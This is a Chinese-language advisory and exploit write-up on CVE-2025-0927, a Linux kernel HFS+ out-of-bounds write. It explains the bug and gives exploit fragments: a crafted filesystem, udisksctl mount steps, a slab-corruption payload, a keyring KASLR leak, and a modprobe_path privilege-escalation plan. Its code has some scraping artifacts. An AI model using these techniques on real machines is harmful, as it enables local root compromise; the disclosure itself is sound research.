CVE-2025-0927：Linux 内核 hfsplus slab 越界写入分析（EXP）

admin

146362
文章

119
评论

2025年3月26日14:04:14评论61 views字数 83541阅读278分28秒阅读模式

CVE-2025-0927：Linux 内核 hfsplus slab 越界写入分析（EXP）

概括

此公告描述了 Linux 内核中的一个越界写入漏洞，该漏洞可在 Ubuntu 22.04 上针对活跃用户会话实现本地权限提升。

信用

与 SSD Secure Disclosure 合作的独立安全研究员。

供应商回应

Ubuntu 发布了以下公告和修复：https://ubuntu.com/security/CVE-2025-0927

受影响的版本

Linux 内核，最高版本 6.12.0
Ubuntu 22.04 搭载 Linux 内核 6.5.0-18-generic

技术分析

这是 Linux 内核 HFS+ 驱动程序中的一个漏洞。有趣的是，自1da1772005 年首次构建 git 存储库（即 Linux-2.6.12-rc2）以来，该漏洞一直存在于内核树中。

HFS+ 曾是主要的Mac OS X文件系统，直到 2017 年随macOS High Sierra发布的Apple 文件系统(APFS)取代它。它基于 B 树数据结构，并且有据可查。漏洞本身是 B 树节点处理中的缓冲区溢出。在某些情况下，在中找到的函数用于从文件系统填充内核缓冲区，并且该函数本身不会检查与密钥大小有关的边界条件。hfs_bnode_read_keyfs/hfsplus/bnode.c

voidhfs_bnode_read_key(struct hfs_bnode *node, void *key, int off)
{
    structhfs_btree *tree;
    int key_len;

    tree = node->tree;
    if (node->type == HFS_NODE_LEAF ||
        tree->attributes & HFS_TREE_VARIDXKEYS ||
        node->tree->cnid == HFSPLUS_ATTR_CNID)
        key_len = hfs_bnode_read_u16(node, off) + 2;
    else
        key_len = tree->max_key_len + 2;

    hfs_bnode_read(node, key, off, key_len);

}

我们的理解是，作者一定假设该函数仅在已验证 B 树记录中存储的相应键具有合理长度值的上下文中调用。特别是，hfs_bnode_find对记录强制约束，以确保键大小在条目大小范围内，此外，在操作 B 树节点内的记录时，中的代码会hfs_brec_insert调用__hfs_brec_find以确定适当的索引，并且该函数是一个对数搜索，它会通过以下方式对遇到的每条记录实施健全性检查hfs_brec_keylen：

/* Get the length of the key from a keyed record */
u16 hfs_brec_keylen(struct hfs_bnode *node, u16 rec)
{
    u16 retval, recoff;

    if (node->type != HFS_NODE_INDEX && node->type != HFS_NODE_LEAF)
        return0;

    if ((node->type == HFS_NODE_INDEX) &&
       !(node->tree->attributes & HFS_TREE_VARIDXKEYS) &&
       (node->tree->cnid != HFSPLUS_ATTR_CNID)) {
        retval = node->tree->max_key_len + 2;
    } else {
        recoff = hfs_bnode_read_u16(node,
            node->tree->node_size - (rec + 1) * 2);
        if (!recoff)
            return0;
        if (recoff > node->tree->node_size - 2) {
            pr_err("recoff %d too largen", recoff);
            return0;
        }

        retval = hfs_bnode_read_u16(node, recoff) + 2;
        if (retval > node->tree->max_key_len + 2) {
            pr_err("keylen %d too largen",
                retval);
            retval = 0;
        }
    }
    return retval;
}

此代码看起来有一些整数溢出问题，但调用上下文可以正确处理这些情况。B 树标头可以max_key_len根据规范定义自己的值，但实际上，在此驱动程序中，hfs_btree_open强制每个文件的最大键大小严格等于编译时已知的常量值：

case HFSPLUS_ATTR_CNID:
        if (tree->max_key_len != HFSPLUS_ATTR_KEYLEN - sizeof(u16)) {
            pr_err("invalid attributes max_key_len %dn",
                tree->max_key_len);
            goto fail_page;
        }

/* HFS+ attributes tree key */
structhfsplus_attr_key {
    __be16 key_len;
    __be16 pad;
    hfsplus_cnid cnid;
    __be32 start_block;
    structhfsplus_attr_unistrkey_name;
} __packed;

#define HFSPLUS_ATTR_KEYLEN sizeof(struct hfsplus_attr_key)

当操作节点时，提取的键存储在与每个 B 树固定大小相对应的通用 kmalloc 缓存中bfind.c：

int hfs_find_init(struct hfs_btree *tree, struct hfs_find_data *fd)
{
    void *ptr;

    fd->tree = tree;
    fd->bnode = NULL;
    ptr = kmalloc(tree->max_key_len * 2 + 4, GFP_KERNEL);
    if (!ptr)
        return -ENOMEM;
    fd->search_key = ptr;
    fd->key = ptr + tree->max_key_len + 2;
    hfs_dbg(BNODE_REFS, "find_init: %d (%p)n",
        tree->cnid, __builtin_return_address(0));
    mutex_lock_nested(&tree->tree_lock,
            hfsplus_btree_lock_class(tree));
    return0;
}

对于属性树，这会导致和max_key_len一个字节0x10a的分配0x218。

然而，并不是所有的调用上下文都保持不变性hfs_bnode_read_key，从而导致了漏洞。

该规范允许 B 树设置比默认0x2000大小大得多的节点，最大可达0x8000，从而允许相应地存储较大的记录和键。

至关重要的是，该函数hfs_brec_find确实存在逻辑缺陷：

/* Traverse a B*Tree from the root to a leaf finding best fit to key */
/* Return allocated copy of node found, set recnum to best record */
inthfs_brec_find(struct hfs_find_data * fd, search_strategy_t do_key_compare){
    structhfs_btree * tree;
    structhfs_bnode * bnode;
    u32 nidx, parent;
    __be32 data;
    int height, res;

    tree = fd -> tree;
    if (fd -> bnode)
      hfs_bnode_put(fd -> bnode);
    fd -> bnode = NULL;
    nidx = tree -> root;
    if (!nidx)
      return -ENOENT;
    height = tree -> depth;

    [..]
    for (;;) {
      [..]
      // Go through records - the writeup author's comment
      __hfs_brec_find(bnode, fd, do_key_compare);

    }

如果我们正在处理的 B 树没有指定根节点，例如它是空指针，则代码将停止并返回-ENOENT。

在这不是终止条件的调用上下文中hfsplus_create_attr，代码将继续尝试插入到它可以插入的第一个位置：

err = hfs_brec_find(&fd, hfs_find_rec_by_key);
if (err != -ENOENT) {
    if (!err)
        err = -EEXIST;
    goto failed_create_attr;
}

err = hfs_brec_insert(&fd, entry_ptr, entry_size);
if (err)
    goto failed_create_attr;

但是请注意，在这种情况下，该__hfs_brec_find函数不会对我们上面建立的任何记录运行，也是为了对密钥大小进行边界检查。

hfs_brec_insert另一方面，插入代码确实直接调用了易受攻击的函数hfs_bnode_read_key：

/*
 * update parent key if we inserted a key
 * at the start of the node and it is not the new node
 */

if (!rec && new_node != node) {
  hfs_bnode_read_key(node, fd -> search_key, data_off + size);
  hfs_brec_update_parent(fd);
}

要触发此操作，只需插入一条新记录，其键在 B 树键排序中小于该特定节点的第一个记录，即可触发缓冲区溢出。同时，属性 B 树的根节点也受攻击者控制，允许攻击者将其设置为空。

值得注意的是，该驱动程序以及许多块设备驱动程序之前都经过了相对广泛的模糊测试，但显然这种特定状态尚未通过模糊测试器重现，即使在手动分析代码库时这是一个相当简单的错误。

可利用性

首先，细心的读者现在应该明白，为了触发这些条件并最终利用漏洞，攻击者必须能够挂载特制的文件系统。

历史上，这仅限于具有该CAP_SYS_ADMIN功能的进程。自从引入命名空间以来，内核社区一直在研究如何限制系统对底层文件系统的信任，以使挂载更加宽松。找到一种方法通常被认为是一个过于困难的问题，但是，对于文件系统来说，有一个例外，它通过FS_USERNS_MOUNT标志表明自己可以在用户命名空间内安全使用。

在讨论该提案时还提到：

> Figuring out how to make semantics safe is what we are talking about.
>
> Once we sort out the semantics we can look at the handful of filesystems
> like fuse where the extra attack surface is not a concern.
>
> With that said desktop environments have for a long time been
> automatically mounting whichever filesystem you place in your computer,
> so in practice what this is really about is trying to align the kernel
> with how people use filesystems.

The key difference is that desktops only do this when you physically
plug in a device. With unprivileged mounts, a hostile attacker
doesn't need physical access to the machine to exploit lurking
kernel filesystem bugs. i.e. they can just use loopback mounts, and
they can keep mounting corrupted images until they find something
that works.

到目前为止，这些讨论都还只是理论性的——据我所知，直到本文撰写之前，还没有人展示过使用畸形文件系统的可行攻击场景。

因此，根据记录，Linux 内核通常只允许具有 CAP_SYS_ADMIN 权限的用户挂载，但是，桌面甚至服务器环境确实允许普通非特权用户挂载和自动挂载文件系统。

具体来说，最新的 Ubuntu 桌面版和服务器版都带有默认的 polkit 规则，允许具有活动本地会话的用户创建循环设备并使用udisks2安装通常在 USB 闪存驱动器上找到的一系列块文件系统。检查/usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy显示：

<actionid="org.freedesktop.udisks2.filesystem-mount">
    <description>Mount a filesystem</description>
    [..]
     <defaults>
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>
</action>

<actionid="org.freedesktop.udisks2.loop-setup">
    <description>Manage loop devices</description>
    [..]
    <defaults>
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <!-- NOTE: this is not a DoS because we are using /dev/loop-control -->
      <allow_active>yes</allow_active>
    </defaults>
  </action>

也就是说，活跃的普通用户（低权限）不仅可以挂载文件系统，还可以基于本地文件设置循环设备，如下所示udisksctl：

DEVICE=$(udisksctl loop-setup -f malformed.raw | grep -o'/dev/loop[0-9]*')`
udisksctl mount -b"$DEVICE"

对于设置为“是”的用户，allow_active以下情况属实：

活动会话：用户必须登录并主动与系统交互（例如，本地桌面会话或终端）。
无需身份验证：用户无需身份验证即可执行操作（无需密码或权限提升）。

尽管据我所知，这是为了让用户体验更舒适的设计决定，但为了讨论利用细节，我将此功能称为“mount oracle*”，强调这是发行版用户空间配置的结果，它实际上绕过了内核本身对普通用户施加的 CAP_SYS_ADMIN 限制。

**Oracle 术语在理论计算机科学中被广泛使用，用于研究复杂性类别，通过数学方法，它们可以神奇地访问通常不具备的计算能力。我觉得这里有一个足够强的类比来滥用这个词。*

开发策略

现在我们已经确定，出于实际目的，我们可以挂载我们选择的特制文件，并且 Ubuntu 和许多其他系统都支持 HFS+ 文件系统，剩下的唯一练习就是为其制作一个实际的漏洞利用程序。

OOB 写入为我们提供了足够的控制权和强大的入门基础。如上所述，缓冲区溢出使我们能够用kmalloc-1k我们选择的数据覆盖通用 slab 缓存中分配的缓冲区，数据大小也是我们选择的，最高可达 16 位。好吧，确切的大小受节点大小限制，但这仍然意味着我们可以用最多近 1024 字节的数据覆盖 1024 字节的缓冲区0x8000。

过去，许多 slab UAF 和 OOB 漏洞利用该msg_msg结构进行内核信息泄露和执行控制，因为它是一种很好的弹性结构，易于从用户空间控制，在漏洞利用场景下表现良好，并且可以跨越多个 kmalloc 缓存大小。自从引入kmalloc-cg-*缓存以来，如果分配标志匹配，易受攻击的对象分配将仅落入同一个 slab 缓存中。

对于 msg_msg 和其他对堆喷射有用的对象，内核开始使用GFP_KERNEL_ACCOUNT来分配它们，因此我们的简单GFP_KERNEL分配将落在一个独立的 slab 缓存中，与所有带有帐户标志的缓存不同。此外，自 6.6 版以来，RANDOM_KMALLOC_CACHES配置选项通过实际将其用作安全措施，进一步加强了安全性，因为它为每种大小引入了*多个* 通用 slab 缓存（名为kmalloc-rnd-01-32等kmalloc-rnd-02-32）。

当通过它分配的对象kmalloc()被“随机”地分配给这 16 个缓存中的一个时，确切的缓存取决于调用站点kmalloc()和每次启动的种子。甚至在最近的 6.11 中，受到msg_msg基于漏洞利用成功的启发，Kees Cook 的一个补丁试图通过 kmem_buckets API 引入一组单独的 kmalloc 存储桶来阻止msg_msg这些攻击，特别是针对。

从大多数实际目的来看，利用其他人之前广泛撰写的技术，利用搭载 5.15 LTS 内核的 Ubuntu 22.04 的此漏洞相当容易。在研究时，22.04 HWE 是 6.5，所以我选择它作为目标。

我们不会深入探讨 SLUB 分配器的内部结构，因为网上有很多资料。Andrey Konovalov 最近在 Linux 安全峰会上的演讲很好地介绍了这个主题。不过，我们会尽量让事情相对独立。

基本上，我们的目标是获取内核空间中我们可以控制的一堆动态分配的对象，使用我们的写原语来破坏它们的字段，使用此功能泄漏一些内核地址以击败KASLR，然后使用更多的内存破坏以某种方式实现本地特权升级。

由于 Ubuntu 等发行版启用了一系列强化配置选项，我们将特别假设这些选项被启用：RANDOMIZE_BASE，，SLAB_FREELIST_HARDENED。SLAB_FREELIST_RANDOMSMEP、SMAP 和 KPTI 也可以假设存在并被启用。

Ubuntu 没有设置的一个选项是CONFIG_STATIC_USERMODEHELPER，这使得攻击者有可能modprobe_path通过一些任意写入原语覆盖内核空间中的变量，最终使用一些简单的 execve 调用轻松地提升权限。

第一步

因此，目前我们的草案策略如下：

制作一个能够触发原始攻击的畸形文件系统

使用我们的“ mount oracle ”以普通用户身份挂载文件系统

将一些有用的对象喷射到 kmalloc-1k 中

触发越界写入原语来破坏这些对象并泄漏 KASLR 基础

modprobe_path修正使用 KASLR 泄漏的地址

将原语转换为任意写入功能

覆盖modprobe_path

Profit.

让我们从第一步开始。

使用制作一个结构良好的 hfsplus 文件系统相对容易mkfs.hfsplus。根据规范，我们期望一个像这样结构的卷。

所有结构都在技术说明中进行了详尽的记录，并且fs/hfsplus/hfsplus_raw.h包含 hfsplus 在块级别使用的所有相关定义。尽管我们调查了一些技巧，利用卷将文件范围映射回 hfs+ 控制“元数据”以使漏洞利用更加漂亮，但我们意识到，在这一点上，它会过于复杂而没有任何教学/写作价值，我们不会处理任何实际处理文件中的数据如何存储在文件系统上的内容。为了便于讨论，这里仅介绍 HFS+ 系统的少数重要事实：

目录文件存储卷上的目录和文件结构。也就是说，当您运行时ls，列出的内容将基于此。
属性文件存储并映射所有扩展属性到文件和目录。每当您调用setxattr时，您都会期望那里发生一些事情。
这两者都只是优秀的老式 B 树数据结构。
毫不奇怪，扩展属性 B 树记录是根据其扩展属性名称进行键入的。

因此，创建mkfs一个 128M hfsplus 卷将产生如下卷头：

00000400: 482b 0004 8000 0100 3130 2e30 0000 0000 H+......10.0....
00000410: e330 03d6 e330 03d6 0000 0000 e330 03d6 .0...0.......0..
00000420: 0000 0000 0000 0000 0000 1000 0000 8000 ................
00000430: 0000 7cfd 0000 1702 0001 0000 0001 0000 ..|.............
00000440: 0000 0010 0000 0000 0000 0000 0000 0001 ................
00000450: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000460: 0000 0000 0000 0000 d809 6a4c 2408 d81f ..........jL$...
00000470: 0000 0000 0000 1000 0000 1000 0000 0001 ................
00000480: 0000 0001 0000 0001 0000 0000 0000 0000 ................
00000490: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004c0: 0000 0000 0010 0000 0010 0000 0000 0100 ................
000004d0: 0000 0002 0000 0100 0000 0000 0000 0000 ................
000004e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000500: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000510: 0000 0000 0010 0000 0010 0000 0000 0100 ................
00000520: 0000 *0c02* 0000 0100 0000 0000 0000 0000 ................
00000530: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000540: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000550: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000560: 0000 0000 0010 0000 0010 0000 0000 0100 ................
00000570: 0000 *0102* 0000 0100 0000 0000 0000 0000 ................
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................

将它与头文件中的结构交叉引用hfsplus_vh并查阅后struct hfsplus_extent，应该很明显：

目录文件位于0xc02000
属性文件位于0x102000

这两个都是 B 树，因此寻找这些地址，我们会看到其中的头节点和 B 树头。

树中的所有节点要么是头节点，要么是索引节点，要么是映射节点，要么是叶节点，无论如何它们都具有这种结构：

现在，我们也不会太关心目录文件。考虑到我们的漏洞，触发原语只需要几个要求：

属性 B 树的根必须为空指针（以绕过检查__hfs_brec_find）
文件系统上必须有一个有效的文件，并且具有我们可以设置属性的全局写入权限（来自目录）
无论我们设置什么扩展属性，它都必须触发hfs_bnode_read_key，这意味着该文件应该已经具有一堆扩展属性，并且我们插入的扩展属性必须具有比这些属性更低的键，因此代码会考虑将其插入为节点中的第一个记录

哦，为了获得有意义的结果，我们的密钥长度应该大于 1024，以便在 kmalloc-1k 溢出中做一些有用的事情，但这很简单。

为了实现这一点，可以使用 mkfs 挂载刚刚创建的新 hfs+ 文件系统。在漏洞利用中，我们只需触摸一个文件/hacked_node并在其上添加一些用户扩展属性。也就是说，我们可以添加user.one、user.two和user.three以及user.four一些虚拟值作为扩展属性。

卸载并检查它在二进制中的样子，我们只需要寻找上面找到的属性文件偏移量0x102000。

00102000: 0000 0000 0000 0000 0100 0003 0000 0000 ................
00102010: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00102020: 2000 010a 0000 0080 0000 007f 0000 0010 ...............

at表示节点具有该大小，并且由于这是一个头节点，我们必须向前寻找才能找到第一个保存实际时髦数据的节点0x2000。0x1020200x2000

00104000: 0000 0000 0000 0000 ff01 0004 0000 001e  ................
00104010: 0000 0000 0010 0000 0000 0009 0075 0073 .............u.s
00104020: 0065 0072 002e 0066 006f 0075 0072 0000 .e.r...f.o.u.r..
00104030: 0010 0000 0000 0000 0000 0000 0005 6475 ..............du
00104040: 6d6d 7900 001c 0000 0000 0010 0000 0000 mmy.............
00104050: 0008 0075 0073 0065 0072 002e 006f 006e  ...u.s.e.r...o.n
00104060: 0065 0000 0010 0000 0000 0000 0000 0000 .e..............
00104070: 0005 6475 6d6d 7900 0020 0000 0000 0010 ..dummy.. ......
00104080: 0000 0000 000a 0075 0073 0065 0072 002e  .......u.s.e.r..
00104090: 0074 0068 0072 0065 0065 0000 0010 0000 .t.h.r.e.e......
001040a0: 0000 0000 0000 0000 0005 6475 6d6d 7900 ..........dummy.
001040b0: 001c 0000 0000 0010 0000 0000 0008 0075 ...............u
001040c0: 0073 0065 0072 002e 0074 0077 006f 0000 .s.e.r...t.w.o..
001040d0: 0010 0000 0000 0000 0000 0000 0005 6475 ..............du
001040e0: 6d6d 7900 0000 0000 0000 0000 0000 0000 mmy.............
001040f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00104100: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00104110: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00104120: 0000 0000 0000 0000 0000 0000 0000 0000 ................

我们不知道您怎么想，但对我来说，这0x1e看起来0x10400e像是一个字节，正在尖叫着被攻击者控制的数据覆盖。一旦我们覆盖它，易受攻击的函数就会堆积文件系统中的任何垃圾，并将memcpy()其覆盖在内存中的 kmalloc-1k slab 上。

我们如何覆盖它？将这些字节写入此文件。之后，我们只需使用我们的 oracle 安装该文件，然后setxattr使用节点中字典顺序最低的属性执行，这将导致内核空间内存损坏。

char *attr_value = "dummy";
int result = setxattr("/tmp/mnt0/hacked_node", "user.1", attr_value, strlen(attr_value), 0);

if (result != 0)
    do_error_exit("setxattr attempt on vuln fs");

我们已经完成了第一部分。

KASLR泄漏

现在我们可以破坏和挂载文件系统并触发不受控制的写入原语，是时候选择一些目标对象了。幸运的是，将一堆喷射到目标缓存中并覆盖这些缓存是一种众所周知的struct user_key_payload技巧。现在，在 6.5 上，这些仍然在通用 kmalloc 缓存中：

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);

然后，交易的工具是使用 keyctl() 启动一堆密钥，并使它们位于 kmalloc-1k 中，然后触发我们的原语并覆盖 datalen：

structuser_key_payload {
  structrcu_headrcu;/* RCU destructor */
  unsignedshort datalen; /* length of this data */
  char data[] __aligned(__alignof__(u64)); /* actual data */
};

只需0x400用 sizeof(struct rcu_head)和覆盖我们的 slab 槽，sizeof(unsigned short)然后希望一切顺利。在漏洞代码中，这对应于：

voidhack_hfs_keyring(unsignedchar * hfs_buffer, size_t len, uint64_t dummy){
    /* Let's check some basic information about our volume */
    parse_volume(hfs_buffer, len);

    /* First, we hack the attribute B-tree a little bit */
    resize_nodes(hfs_buffer, len);

    /* Remove root */
    remove_root(hfs_buffer, len);

    /* Corrupt key length */
    corrupt_key_len(hfs_buffer, len, 0x418 - 2);

    uint8_t payload[24] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xff, 0xff, 0x53, 0x53, 0x53, 0x53, 0x53, 0x53
    };

    uint16_t payload_len = sizeof(payload);

    /* Write kmalloc-1k payload */
    write_payload(hfs_buffer, len, payload, payload_len);
}

此代码的唯一目的是破坏单个键，并用覆盖其数据长度0xffff，这将是一种非常舒适的越界读取。

如果我们的内核模式 mambojambo 成功了，我们实际上可以在用户空间中检查该情况：

uint64_t get_keyring_leak(key_serial_t * id_buffer, uint32_t id_buffer_size)`
{
    uint8_t buffer[USHRT_MAX] = {0};
    int32_t keylen;

    printf("[+] Checking sprayed keys for corruptionn");
    for (uint32_t i = 0; i < id_buffer_size; i++) {

        keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, USHRT_MAX, 0);

        if (keylen < 0)
            continue;

        if (keylen > 1024) {
            printf("[+] Found corrupted key, triggering infoleakn");
            return parse_leak(buffer, keylen);
        }
    }
    return0;
}

此时通过适当的系统调用读取密钥实际上会导致 65k 内核内存的转储。

这一切都很有趣，但为了击败 KASLR，随机的内核内存转储是不够的。我们需要一些可以计算地址的函数指针。嗯，说起来容易做起来难。

除了几篇学术论文试图系统地研究所有具有良好接口的 slab 分配弹性对象外，关于堆喷射的权威指南的信息并不多。很难公正地对待这个主题，对于实际利用，人们总是直接使用特定的内核构建。行业工具要么使用pahole来寻找 Linux 内核中的良好结构，但该工具完全是静态的，它完全不了解用户空间的可污染性，因此另一种方法是为 CodeQL 查询创建一个 Linux 内核数据库，并使用一些智能过滤来优化对目标的搜索：

/**
 * @name Find interesting objects for kernel heap exploitation
 * @id cpp/kernel-interesting-objects
 * @description Finds interesting objects for kernel heap exploitation
 * @kind problem
 * @precision low
 * @tags security kernel
 * @problem.severity error
 */

import cpp

classFlexibleArrayMemberextendsField{
  FlexibleArrayMember() {
    exists(Struct s |
      this = s.getCanonicalMember(max(int j | s.getCanonicalMember(j) instanceof Field | j))
    ) and
    this.getUnspecifiedType() instanceof ArrayType and
    (
      this.getUnspecifiedType().(ArrayType).getArraySize() <= 1 or
      not this.getUnspecifiedType().(ArrayType).hasArraySize()
    )
  }
}

classKmallocCallextendsFunctionCall{
  KmallocCall() { this.getTarget().hasName(["kmalloc", "kzalloc", "kvmalloc"]) }

Expr getSizeArg(){ result = this.getArgument(0) }

string getFlag(){
    result =
      concat(Expr flag |
        flag = this.getArgument(1).getAChild*() and flag.getValueText().matches("%GFP%")
      |
        flag.getValueText(), "|"
      )
  }

string getSize(){
    ifthis.getSizeArg().isConstant()
    then result = this.getSizeArg().getValue()
    else result = "unknown"
  }

Type sizeofParam(Expr e){
    result = e.(SizeofExprOperator).getExprOperand().getFullyConverted().getType()
    or
    result = e.(SizeofTypeOperator).getTypeOperand()
  }

Struct getStruct(){
    exists(Expr sof |
      this.getSizeArg().getAChild*() = sof and
      this.sizeofParam(sof) = result
    )
  }

string isFlexible(){
    this.getSize() = "unknown" and
    this.getStruct().getAField() instanceof FlexibleArrayMember and
    result = "true"
    or
    not this.getSize() = "unknown" and
    not this.getStruct().getAField() instanceof FlexibleArrayMember and
    result = "false"
  }
}

from KmallocCall kfc, Struct s
where
  s = kfc.getStruct() and
  not kfc.getSizeArg().isAffectedByMacro()
select kfc.getLocation(), kfc, s, s.getLocation(), s.getSize(), kfc.getFlag(), kfc.getSize(),
  kfc.getArgument(0), kfc.isFlexible()

最后的手段，我的查克·诺里斯方法是真正放弃所有那些静态分析方法，并在 gdb 中设置断点。

kmalloc()毕竟，拦截所有调用并过滤最终进入我们的通用 kmalloc-1k slab 缓存的分配并不是那么困难。

但结果却令人失望。

跨缓存覆盖读取

再次强调，我们希望一直在 kmalloc-1k 中工作，但事实证明，在 6.5 上我们可以喷射的弹性对象只有少数，而对于我们的 KASLR 绕过，我们实际上需要一个包含一些指针引用的对象，我们可以使用这些指针根据我们的内核构建进行算术运算，以恢复在开始时添加的随机偏移量。

也许我忽略了一些东西，但根据内核 CTF 社区的资源，我发现的最佳候选对象是 tty_struct。以下是摘要smallkirby/kernelpwn：

然而，坏消息是，tty_struct分配了会计标志：

/**
 * alloc_tty_struct - allocate a new tty
 * @driver: driver which will handle the returned tty
 * @idx: minor of the tty
 *
 * This subroutine allocates and initializes a tty structure.
 *
 * Locking: none - @tty in question is not exposed at this point
 */
struct tty_struct * alloc_tty_struct(struct tty_driver * driver, int idx){
    structtty_struct * tty;
    tty = kzalloc(sizeof( * tty), GFP_KERNEL_ACCOUNT);
    if (!tty) returnNULL;

这意味着它是在 kmalloc-cg-1k 中分配的，而不是在 kmalloc-1k 中分配的。就这么简单。

这时候寻找更多选项以保证保持在正常的 kmalloc-1k 范围内是有意义的。

尽管如此，考虑到 Ubuntu 24.04 中已经存在的所有强化措施，并且已经发布了强化内核 6.8，因此，面对不可避免的情况是非常有意义的：从现在开始，现代 slab UAF 和 OOB 漏洞可能不得不依赖于跨缓存攻击。如果这些攻击也被阻止，那么可能还会有一些更复杂的攻击。（不要误会我的意思，这对安全来说是个好消息，但在这里我们采取的是进攻性安全方法和黑客思维。）

我们认为细心的读者知道这是怎么回事，我们将“简单”地跨缓存到 kmalloc-cg-1k 作为练习，并重用 tty_struct 的所有优良属性以实现 kaslr 泄漏和获利。

跨缓存什么

长话短说，没有人喜欢跨缓存攻击，因为它们很难，它们以不可靠而闻名（尽管，有趣的是，如果你跟踪引用声称这一点的引文，你不会找到任何明确的统计数据）。

了解这些的内核开发人员并不多，也许只有那些有时间和资源编写内核 CTF 来取乐的人才会这样做。最近发表的一项系统性研究试图提出一种通用方法，将非常弱的内存损坏原语转变为实用的跨缓存攻击，但对于 kmalloc-1k，我们无法真正重现他们的结果，这很遗憾。

另一方面，Etenal 针对 CVE-2022-27666 写了一篇经典文章，阐述了这个想法，而且方法更加实用——请注意，他别无选择，只能走这条路：https://etenal.me/archives/1825。

此外，willsroot 的 CTF 问题和对一个很酷的跨缓存技巧的分析虽然不能很好地转移到现实生活中：https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html，但非常酷。我相信还有很多，但事实上 Will 在 2022 年说过这样的话：

I found resources onthis strategy quite scarce, and haven’t personally seen a CTF challenge that requires it.

好吧，这让我确信，出于教学原因在这里深入挖掘是非常有意义的。

与计算机科学中的一切一样，这个想法通常很简单。内核中的 slab/slub 分配器的目的是针对小于页面的对象进行实际最佳的分配，并且由于内核中小对象分配发生得如此频繁，以至于分配器必须经过多次优化才能最终达到当前的 SLUB 架构，事实证明，优化页面分配性能对于内存分配同样重要。

事实证明，当 Linux 真正流行起来时，这个问题就已经解决了。

这个想法最初是由 Harry Markowitz 在 60 年代发明的，并在 Donald Knuth 的《计算机编程艺术》中得到推广，该书在内核文档中被引用。与这些书中的其他材料类似，直到最近，在内核黑客中讨论页面分配仍然是一个不太吸引人的话题。

因此，为了更好地理解这个概念，我尝试编写一个简单的模拟器。总体思路是，由于这不是释放后使用：

我们只需要分配一堆对象，在某个时候，kmem_cache 将从页面分配器中分配一个 slab（结果是一个 order-1 页面块，这意味着它是 2*pagesize）
对于 kmalloc-1k 和 kmalloc-cg-1k 来说也是如此。
结论是，只要我能大致同时触发这两个 slab 缓存中的对象分配，我就可能有机会。

如何？

通过运行一系列模拟运行，我相信，每当发生 2 阶或 3 阶页面块拆分时，内核空间代码都会有一个健康的时间窗口来获取两个相邻的连续页面分配，就像空间上相邻一样

我意识到此时这变得完全是推测，所以我编写了一些 Python 代码来亲自看看。

每当有一条垂直的红色虚线时，我们就会陷入这样一种境地：两次分配随机地产生了一种对页面级堆风水来说非常理想的情况：我们可以覆盖我们的易受攻击的 slab，让目标 slab 从页面分配器中抓取 order-1 页面，然后我们就可以溢出到该内存区域。

Etenal（顺便提一句，他除了是一名精英内核黑客之外，似乎还是一名出色的摄影师）写道：

To mitigate this noise, I did something shown below:

1. drain the freelist of order 0, 1, 2.
2. allocate tons of order-2 objects(assume it’s N), by doing so, order 2 will borrow pages from order 3.
3. free every half of objects from step 2, hold the other half. This creates N/2 more object back to order-2’s freelist.
4. free all objects from step 1

这在空闲的 QEMU 系统上非常有效。它在生产中有效吗？这取决于内存分配噪音，但实际上它对于 OOB 读取非常有效。伙伴分配器空闲列表的状态实际上是通过 proc 为每个订单公开的：

有一件事是肯定的，因为我们的目标是 kmalloc-1k，它分配长度为 8k 字节的 slab，对应于顺序 1 页面分配，所以在第 2 页堆喷射上触发我们的 OOB 写入非常有意义。

为什么？因为，感谢 Donald Knuth，有一件事是毫无疑问的：就在 2 阶分配刚刚在伙伴分配器中分成伙伴的时候，我们很有可能为支持我们的隔离kmem_cache板的内存区域获取两个连续的分配。

回到我们的模拟器并实现排水，看起来像这样：

defsimulate_time_evolution(self):
        """Simulate kernel noise generation over a series of time steps."""
        for time_step in range(TIME_STEPS):
            self.generate_noise()
        # Simulate freelist draining for cross-cache heap fengshui
        if time_step == 80:
            print("Draining freelists")
            buddyinfo = self.buddy_allocator.get_free_list_state()
            for_in range(buddyinfo[0]):
                 self.buddy_allocator.allocate(0)
            for_in range(buddyinfo[1]):
                 self.buddy_allocator.allocate(1)
            for_in range(1):
                 self.buddy_allocator.allocate(2)

        # Record the current state of the buddy allocator's free lists
        self.free_list_history.append(self.buddy_allocator.get_free_list_state())
        # Check for consecutive order-1 block allocations
        self.check_consecutive_allocations(time_step)

这确实会导致每次运行时出现几个跨缓存 OOB 的理想点，如下所示：

为了进一步测试这个概念，我们编写了一个小内核模块，将procfs节点公开为一种时间侧通道，并允许用户空间检查这两个连续的 slab 分配是否实际发生。结果如何？

猜猜看，Etenal 说了什么：

Once it borrows pages from a higher order, two consecutively allocations will split the higher-order pages, and most importantly, the higher-order pages are a chunk of contiguous memory.

